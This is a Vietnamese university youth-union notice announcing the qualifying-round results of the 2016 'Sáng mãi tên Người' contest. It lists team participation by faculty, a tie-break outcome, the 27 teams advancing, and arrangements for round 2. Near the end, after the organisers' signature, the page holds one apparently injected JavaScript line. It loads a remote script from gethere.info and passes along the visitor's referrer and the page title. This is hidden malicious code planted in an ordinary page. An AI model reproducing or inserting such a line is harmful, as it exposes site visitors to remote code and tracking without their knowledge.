THÔNG BÁO SỐ 3 – KẾT QUẢ VÒNG LOẠI HỘI THI SÁNG MÃI TÊN NGƯỜI LẦN VII – NĂM 2016

0
1206

104TBDTN-Thong bao ket qua thi vong loai SMTN 2016

Kết quả vòng loại Hội thi Sáng mãi tên Người 2016 – Cá nhân

Danh sách 27 đội thi lọt vào vòng 02 Hội thi Sáng mãi tên Người 2016

THÔNG BÁO SỐ 3

Kết quả thi vòng loại và danh sách đội lọt vào vòng 2

Hội thi “Sáng mãi tên Người” lần VII – Năm 2016

  1. Tình hình thi vòng loại ngày 06/3/2016

Sau khi kết thúc thi vòng loại, BTC thông tin tới các cơ sở Đoàn và các đội thi tình hình và kết quả vòng loại như sau:

  • Tình hình đội thi và thí sinh tham gia thi:

– Tổng số đội đăng ký: 109 đội

– Tổng số đội tham gia thi: 78

CƠ SỞ ĐỘI THI/ĐỘI ĐĂNG KÝ CƠ SỞ ĐỘI THI/ĐỘI ĐĂNG KÝ
TOÁN TIN 01/03 CÔNG NGHỆ THÔNG TIN 0
VẬT LÝ – VLKT 18/27 KHOA HỌC VẬT LIỆU 02/02
HÓA HỌC 10/11 ĐIỆN TỬ VIỄN THÔNG 02/03
SINH HỌC 25/35 CĐ CÔNG NGHỆ THÔNG 0
MÔI TRƯỜNG 06/06 LIÊN QUÂN 09/10
ĐỊA CHẤT 05/06 TỔNG CỘNG 78/109

– Tổng số thí sinh tham gia thi: 303, trong đó:

  • Kết quả thi: Xem chi tiết tại file đính kèm

Kết thúc vòng loại, có 02 đội thi cùng xếp vị trí 27 (do có điểm chính và điểm phụ đều bằng nhau) là đội MT02 và đội HH05. Do đó, BTC đã tổ chức phần thi phụ cho 02 đội tham gia vào sáng ngày 07/3/2016 và kết quả phần thi phụ như sau:

TÊN ĐỘI ĐIỂM TỔNG
HH05 42
MT02 28

Căn cứ theo thể lệ, kết quả vòng loại và phần thi phụ, BTC đã chọn 27 đội (xem trong file đính kèm) có số điểm cao từ trên xuống để tham gia vòng 02 của hội thi. Mọi thắc mắc, phản hồi về kết quả của cuộc thi, các thí sinh và đội thi phản hồi trực tiếp cho BTC qua Email: nvlinh@hcmus.edu.vn chậm nhất là 20h00 ngày 07/3/2016.

– Danh sách 27 đội thi lọt vào vòng 02 hội thi:

STT MÃ ĐỘI ĐIỂM STT MÃ ĐỘI ĐIỂM STT MÃ ĐỘI ĐIỂM
1 SH01 129 10 SH04 106 19 SH09 92
2 MT03 124 11 LQ04 101 20 LQ06 91
3 KV01 124 12 SH20 100 21 VL10 91
4 SH02 121 13 SH05 100 22 KV02 90
5 HH01 114 14 VL15 99 23 VL03 90
6 HH02 112 15 SH12 96 24 VL05 89
7 MT04 110 16 VL06 96 25 MT06 89
8 SH10 107 17 LQ01 93 26 VL17 87
9 VL01 106 18 HH03 93 27 HH05 87

          Kể từ vòng thi này trở đi, mỗi đội dự thi phải mời 01 Cán bộ trẻ hoặc 01 Đảng viên (không phải Đảng viên sinh viên) cùng tham gia và được tính là 01 thành viên của đội tuyển; khuyến khích là Cán bộ trẻ của chính các khoa của đội dự thi. Cán bộ trẻ tham gia không được là thành viên của Đội tuyển cấp trường tham gia các Hội thi tìm hiểu chủ nghĩa Mác – Lênin, tư tưởng Hồ Chí Minh của Thành Đoàn tổ chức. Các đội thi phải thông tin Cán bộ trẻ/Đảng viên cùng tham gia với Đội về cho BTC, chậm nhất là 11h00, thứ sáu, ngày 11/3/2016 bằng email về địa chỉ tuyengiao.khtn@gmail.com với tiêu đề [Mã đội] – [Tên đội] – Thông tin Cán bộ trẻ.

Thời gian diễn ra vòng 02 của hội thi từ 07h30 đến 11h30 ngày 13/3/2016 (chủ nhật) tại sân trường Đại học Khoa học Tự nhiên (cơ sở 227 Nguyễn Văn Cừ, Phường 4, Quận 5) và các địa điểm trong địa bàn Thành phố.

THỂ LỆ CHI TIẾT VÒNG 2 sẽ được thông báo cụ thể tới đội thi trong buổi họp với đội thi vào lúc 11h30 ngày 08/3/2016 (thứ ba). Yêu cầu mỗi đội thi phải cử thành viên tham gia họp, đội nào không cử đại diện tham gia trong cuộc họp mà không được sự đồng ý của BTC, đội đó sẽ bị loại. Trong trường hợp có đội bỏ cuộc, Ban tổ chức sẽ lấy đội xếp thứ tự tiếp theo trong bảng xếp hạng tham gia vòng 2.

BAN TỔ CHỨC HỘI THI

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

CHIA SẺ